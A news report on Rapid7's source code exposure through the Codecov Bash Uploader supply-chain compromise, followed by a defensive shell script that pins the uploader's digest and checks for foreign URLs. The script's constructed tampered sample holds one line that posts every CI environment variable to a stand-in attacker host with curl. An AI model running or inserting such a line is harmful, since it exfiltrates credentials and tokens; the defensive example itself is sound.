Rapid7 Source Code Compromised in Codecov Supply Chain Incident

Rapid7 Source Code Repositories Compromised Following Codecov Incident

Cybersecurity firm Rapid7 has disclosed that an unauthorized party gained access to a small subset of its source code repositories. The disclosure follows the breach of Codecov, a code coverage service whose Bash Uploader script was tampered with earlier this year in a software supply chain attack. The Boston-based company stressed that the repositories in question held internal tooling for its Managed Detection and Response (MDR) service, not product code.

In an official statement, Rapid7 confirmed that the repositories contained some internal credentials, all of which have since been rotated, along with alert-related data for a subset of its MDR customers. Rapid7 attributes the access to the Codecov incident, in which an attacker modified the Bash Uploader so that it harvested credentials and other secrets from the CI environments of every customer running the altered script.

The Codecov breach, made public on April 15, revealed that the company's Bash Uploader had been tampered with as early as January 31. According to Codecov, an error in its Docker image creation process allowed the attacker to extract the credential needed to modify the Uploader script. With that access the attacker periodically altered the script so that, when it ran inside a customer's CI job, it exported the job's environment variables (which in most CI systems carry credentials, tokens and keys) to a third-party server.

Rapid7 has stated that it found no evidence of access to any other corporate systems or production environments. In MITRE ATT&CK terms the chain is a software supply chain compromise (T1195.002) used for initial access: the attacker gained persistence in Codecov's distribution channel by repeatedly re-applying the modification to the Bash Uploader, and every CI run that fetched the script handed over its secrets. Rapid7's investigation is therefore focused on the single CI server that ran the script and on the credentials it exposed, rather than on a broader compromise of the company's operations.

As part of its incident response, Rapid7 has contacted the affected customers directly. The company reiterated that the compromised Uploader script was used on only one continuous integration server, dedicated to building and testing internal tooling for the MDR service.

The incident places Rapid7 on a growing list of organizations, including HashiCorp, Confluent and Twilio, that have publicly acknowledged exposure through the Codecov breach. Codecov has advised affected users to rotate every credential, token or key that was present in their CI environments while the tampered script was in use, since anything in those environment variables must be assumed to have been captured.
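The mechanism described above (a build-time script fetched from a third party and run with full access to the CI environment) is what the credential-rotation advice is reacting to. The following is an added example, not code from Rapid7, Codecov or the original article: a POSIX shell gate that pins a CI uploader script to a known SHA-256 and refuses to execute it if the digest has changed or if the script contains a URL to any host other than the expected one. The two sample uploader scripts, the `attacker.example` host, the injected `curl` line and the function names (`verify_uploader`, `check_egress`, `run_if_trusted`) are all constructed for this illustration; the pinned digest is computed from the constructed clean file so the example runs offline, whereas in real use it would be a value committed to the repository.

```shell
#!/bin/sh
# Added example: gate a third-party CI uploader behind a pinned digest and an
# egress check instead of running `bash <(curl -s https://example/uploader)`.
# The sample uploader files, the attacker.example host and the injected curl
# line below are constructed stand-ins, not real Codecov or attacker artifacts.
set -eu

# Hex SHA-256 of a file; works with GNU sha256sum or BSD/macOS shasum.
file_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# 0 if the file's digest equals the pinned digest, 1 otherwise.
verify_uploader() {
  [ "$(file_sha256 "$1")" = "$2" ]
}

# 0 if every http(s) URL in the script points at $2 or one of its subdomains,
# 1 if any other host appears (a tampered uploader has to send the data somewhere).
check_egress() {
  file="$1"
  esc=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape dots for the regex
  if grep -oE 'https?://[A-Za-z0-9._-]+' "$file" \
      | sed -E 's#^https?://##' \
      | grep -vE "(^|\.)${esc}\$" \
      | grep -q .; then
    return 1
  fi
  return 0
}

# Run the uploader only if both checks pass; otherwise refuse and say why.
run_if_trusted() {
  file="$1"; pinned="$2"; allowed_host="$3"
  if ! verify_uploader "$file" "$pinned"; then
    echo "refusing to run $file: SHA-256 does not match the pinned value" >&2
    return 1
  fi
  if ! check_egress "$file" "$allowed_host"; then
    echo "refusing to run $file: contains a URL outside $allowed_host" >&2
    return 1
  fi
  sh "$file"
}

# --- constructed samples -----------------------------------------------------
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
CLEAN="$WORKDIR/uploader_clean.sh"
TAMPERED="$WORKDIR/uploader_tampered.sh"

# Stand-in for a legitimate uploader: only refers to the expected host.
cat > "$CLEAN" <<'EOF'
#!/bin/sh
echo "would upload coverage report to https://codecov.io/upload/v2"
EOF

# Same script with an injected line that posts every CI environment variable
# (tokens, keys, passwords) to an attacker-controlled host.
cat > "$TAMPERED" <<'EOF'
#!/bin/sh
echo "would upload coverage report to https://codecov.io/upload/v2"
curl -sm 0.5 -d "$(env)" http://attacker.example/upload || true
EOF

# In real use this value is pinned in the repository; here it is derived from
# the constructed clean file so the example runs offline.
PINNED_SHA256=$(file_sha256 "$CLEAN")

run_if_trusted "$CLEAN" "$PINNED_SHA256" codecov.io           # runs the uploader
run_if_trusted "$TAMPERED" "$PINNED_SHA256" codecov.io || :   # refused: digest mismatch
```

The digest pin is the primary control: it would have rejected every altered copy of the script regardless of what the alteration did. The egress grep is a secondary, heuristic check that catches the obvious case of a hard-coded foreign URL but is easily defeated by a URL assembled at runtime or held in a variable, so it should never be relied on alone. Neither check helps with secrets already leaked before the pin was introduced, which is why rotation remains necessary.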

The episode is a reminder that a build-time dependency pulled from a third party runs with access to every secret in the CI environment, and that a single compromised build server can expose both source code and customer data. Rapid7's experience shows the value of confining such tooling to narrowly scoped systems, auditing what third-party scripts are allowed to reach, and being ready to rotate credentials quickly when an upstream provider reports a compromise.
